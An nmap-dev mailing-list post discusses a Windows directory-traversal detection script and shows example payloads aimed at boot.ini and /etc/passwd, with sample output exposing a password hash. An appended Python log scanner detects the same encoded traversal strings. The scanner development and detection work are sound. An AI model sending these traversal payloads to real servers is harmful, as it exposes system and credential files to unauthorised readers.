Nmap Development mailing list archives
Re: [NSE] Webservers Directory Traversal Vulnerability (under windows)
From: Gutek <ange.gutek () gmail com>
Date: Sat, 19 Jun 2010 17:44:55 +0200
Here is a merged version.

I just added checks for boot.ini in the original generic directory escalation strings table. Those are "dot and slashes hexified".

Then I added another table for more specific payloads. The script has to deal with them in a different way than the generic ones: they cannot always be fully hexified, sometimes they need special prepend/append... in a word, those strings have to be passed "as published" through the GET request.

Concerning boot.ini: it exists on Windows <=XP, not on Vista or Seven.

Example Outputs:

-- @output
-- 80/tcp open http
-- | http-passwd: Directory Traversal Found.
-- | Payload: "index.html?../../../../../boot.ini"
-- | Printing first 250 bytes:
-- | [boot loader]
-- | timeout=30
-- | default=multi(0)disk(0)rdisk(0)partition(1)\WINDOWS
-- | [operating systems]
-- |_multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Microsoft Windows XP Professional" /noexecute=optin /fastdetect
--
--
-- 80/tcp open http
-- | http-passwd: Directory Traversal Found.
-- | Payload: "../../../../../../../../../../etc/passwd"
-- | Printing first 250 bytes:
-- | root:$1$$iems.VX5yVMByaB1lT8fx.:0:0::/:/bin/sh
-- | sshd:*:65532:65534::/:/bin/false
-- | ftp:*:65533:65534::/:/bin/false
-- |_nobody:*:65534:65534::/:/bin/fals

A.G.
Attachment:
http-passwd.nse
Description:
_______________________________________________
Sent through the nmap-dev mailing list
http://cgi.insecure.org/mailman/listinfo/nmap-dev
Archived at http://seclists.org/nmap-dev/
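A defender's view of the payload styles described in the message above, as an added example that is not part of the original post or of http-passwd.nse: a Python access-log check that percent-decodes each request target (repeatedly, so hexified and double-encoded dots and slashes are caught) before looking for ".." segments aimed at boot.ini or etc/passwd. The log lines, addresses and function names are constructed for illustration, and the common log format is an assumption.

```python
import re
from urllib.parse import unquote

TARGET_FILES = ("boot.ini", "etc/passwd")  # the two files named in the post
# ".." as a whole path or query segment (after / ? = & or at start).
DOTDOT = re.compile(r"(?:^|[/?=&])\.\.(?:/|$)")
# Assumed common log format: client ... "METHOD target HTTP/x.y" status size
LOG_LINE = re.compile(r'^(\S+) .*?"(?:GET|HEAD|POST) (\S+) HTTP/[\d.]+" (\d{3}) ')

def normalize(target, max_rounds=3):
    """Percent-decode until stable so %2e%2e%2f and %252e%252e%252f both become ../"""
    for _ in range(max_rounds):
        decoded = unquote(target)
        if decoded == target:
            break
        target = decoded
    # Windows servers accept backslashes as separators; compare case-insensitively.
    return target.replace("\\", "/").lower()

def classify(target):
    """Return None, 'traversal', or 'traversal:<file>' for a raw request target."""
    norm = normalize(target)
    if not DOTDOT.search(norm):
        return None
    for name in TARGET_FILES:
        if name in norm:
            return "traversal:" + name
    return "traversal"

def scan(lines):
    """Return (client, verdict, status) for each flagged log line."""
    hits = []
    for line in lines:
        m = LOG_LINE.match(line)
        if m and classify(m.group(2)):
            hits.append((m.group(1), classify(m.group(2)), int(m.group(3))))
    return hits

# Constructed sample log lines (documentation address ranges).
SAMPLE_LOG = [
    '192.0.2.10 - - [19/Jun/2010:17:40:01 +0200] "GET /index.html HTTP/1.1" 200 512',
    '192.0.2.10 - - [19/Jun/2010:17:40:02 +0200] "GET /index.html?../../../../../boot.ini HTTP/1.1" 200 211',
    '192.0.2.10 - - [19/Jun/2010:17:40:03 +0200] "GET /%2e%2e%2f%2e%2e%2fetc%2fpasswd HTTP/1.1" 404 0',
    '198.51.100.7 - - [19/Jun/2010:17:41:10 +0200] "GET /%252e%252e%255cboot.ini HTTP/1.1" 403 0',
    '198.51.100.7 - - [19/Jun/2010:17:41:11 +0200] "GET /docs/v1..2/notes.html?file=boot.ini HTTP/1.1" 200 90',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

A flagged request that was answered with status 200 is the case to triage first, since that is the situation in which the script reports "Directory Traversal Found".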
Current thread:
- [NSE] Webservers Directory Traversal Vulnerability (under windows) Gutek (May 24)
- Re: [NSE] Webservers Directory Traversal Vulnerability (under windows) Ron (May 24)
- Re: [NSE] Webservers Directory Traversal Vulnerability (under windows) Gutek (May 24)
- Re: [NSE] Webservers Directory Traversal Vulnerability (under windows) David Fifield (Jun 18)
- Re: [NSE] Webservers Directory Traversal Vulnerability (under windows) Gutek (Jun 19)
- Re: [NSE] Webservers Directory Traversal Vulnerability (under windows) Gutek (Jun 19)
- Re: [NSE] Webservers Directory Traversal Vulnerability (under windows) David Fifield (Jun 22)
- Re: [NSE] Webservers Directory Traversal Vulnerability (under windows) Gutek (May 24)
- Re: [NSE] Webservers Directory Traversal Vulnerability (under windows) Ron (May 24)